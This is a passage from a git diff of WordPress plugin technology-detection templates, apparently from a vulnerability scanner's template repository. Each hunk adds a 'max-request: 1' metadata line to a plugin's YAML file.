+7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 88d38e21ed..23a88ea130 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- 